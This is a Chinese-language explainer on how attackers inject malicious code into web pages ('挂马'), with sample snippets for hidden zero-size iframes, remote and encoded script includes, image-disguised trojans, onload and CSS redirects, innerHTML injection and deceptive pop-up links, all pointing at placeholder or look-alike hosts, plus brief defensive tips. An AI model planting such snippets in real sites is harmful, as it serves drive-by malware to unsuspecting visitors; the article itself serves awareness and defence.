各种网页挂马方式原理揭密(iframe挂马,script 挂马,图片伪装挂马等)

2024.04.29

    下面介绍集中常见的网页挂马方式：
    （1）iframe 框架挂马
    在网页上增加一行挂马的程序，例如：
    <iframe src=http://www.xxx.com/xxx.html width=0 height=0></iframe>
    这种嵌入是的挂马非常常见，在Google中搜索发现的可能还有木马的网页，一般都是被这种方式挂马。这行语句就是在网页打开的时候，同时打开另外一个网页，当然这个网页可能包含大量的木马，也可能仅仅是为了骗取流量。
    如果我们的网页不使用iframe，我们可以屏蔽iframe属性，这样，即使网页被iframe挂马，也不会伤害到访问网站的用户。
    【原理】：
    IE5及其以后版本支持在CSS中使用expression，用来把CSS属性和JavaScript脚本关联起来，这里的CSS属性可以是元素固有的属性，也可以是自定义属性。
    我们在网页中增加如下的代码即可屏蔽iframe属性：
    <style type=”text/css”>
    iframe{a:expression(this.src=’about:blank’,this.outerHTML=”);}
    </style>
    iframe 也可以采用加密的方式挂马，例如下面的代码：
    <iframe src=http://google-analitecs.com/in.cgi????? width=1 height=1></iframe>
    （2）script 挂马
    通过script的调用来挂马，可以挂直接的html文件，也可以挂js文件，可以明文挂马，为了躲避追查，也有加密挂马的形式，形式各异，千差万别，主要方式如下：
    <script src=http://%11%11%11%11%11%11%11></script>
    这是一个加密的挂马语句；
    2.1 htm文件挂马：
    通过上传一个木马文件(x.htm)挂马，代码如下：
    document.write(“<div style=’display:none’>”)
    document.write(“<iframe src=x.htm width=0 height=0></iframe>”)
    document.write(“</div>”)
    htm 挂马代码:
    <script src=x.htm></script>
    2.2 js文件挂马
    通过上传一个木马文件(x.js)挂马，代码如下：
    document.write(“<iframe width=’0′ height=’0′ src=’http://xxx.com/xxx.htm’></iframe>”);
    JS挂马代码:
    <script language=javascript src=x.js></script>
    当然也可以挂互联网上任何一台机器的x.js文件；
    2.3 js变形加密
    <SCRIPT language=”JScript.Encode” src=http://www.xxx.com/x.x></script>
    （3）图片伪装挂马
    随着防毒技术的发展，图片木马技术逃避杀毒监视的新技术，攻击者将类似：http://www.xxx.com/x.htm中的木马代码植入到x.gif图片文
    件中，这些嵌入代码的图片都可以用工具生成。图片木马生成后，再利用代码调用执行，是比较新颖的一种挂马隐蔽方法，实例代码如：
    <html>
    <iframe src=”http://www.x.com/x.htm” height=0 width=0></iframe>
    <img src=”http://www.x.com/x.jpg”></center>
    </html>
    当用户打开http://www.x.com/x.htm是，显示给用户的是http://www.x.com/x.jpg，而http://www.x.com/x.htm网页代码也随之运行。
    （4）其它的挂马方式
    4.1 body挂马
    <body onload=”window.location=’http://xxx.com/xxx.htm’;”></body>
    也可以在css的body中挂马
    body {
    background-image: url(‘javascript:document.write(“<script src=http://www.xxx.com/x.js></script>”)’)}
    4.2 隐蔽挂马
    top.document.body.innerHTML = top.document.body.innerHTML +
    ‘\r\n<iframe src=”http://www.xxx.com/xxx.htm/”></iframe>’;
    4.3 java的open函数挂马
    直接调用：
    <SCRIPT language=javascript>
    window.open (“x.htm”,””,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1″);
    </script>
    欺骗调用：
    <a href=”http://www.a.com(迷惑连接地址，显示这个地址指向木马地址)” onMouseOver=”www_a_com(); return true;”> 页面要显示的内容 </a>
    <SCRIPT Language=”JavaScript”>
    function www_a_com ()
    {
    var url=”网马地址”;
    open(url,”NewWindow”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,w
    idth=800,height=600,left=10,top=10″);
    }
    </SCRIPT>
    4.4 伪装调用：
    <frameset rows=”444,0″ cols=”*”>
    <frame src=”a.htm” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″>
    <frame src=”b.htm” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″>
    </frameset>
    形形色色的网页挂马，代码都十分简单，所以，互联网木马想要传播，就会不停的开发新的挂马方式，不停的加密隐藏自己，这样才能逃过各种安全软件的眼睛。其实，看看上文，很多语句都是编程常用的代码，只是使用的目的不一样罢了，了解了网页挂马的原理和方法，再防范网页挂马就容易多了。
    带木马的网页主要包括两种类型：一种自己本身就是木马网站，所有的页面都有木马，另一种是正常的网站，由于管理不善，被挂马，成为木马网站的一个中转站，看看google中这样的网站何其多，可能很多站长现在还不知道，呵呵，多学习学习吧，站长可不是那么好当的。
    不过，仅仅有了网络挂马的代码，也不一定一定能传播木马，只要我们加强防范，不让我们的网页被挂马，甚至，即使被挂马了，打开了木马网页，我们的系统没有漏洞，木马网页也同样不能发挥作用的。所以，最重要的安全防范方式就是定期给系统打补丁，几乎所有的木马网页都无法发挥作用了。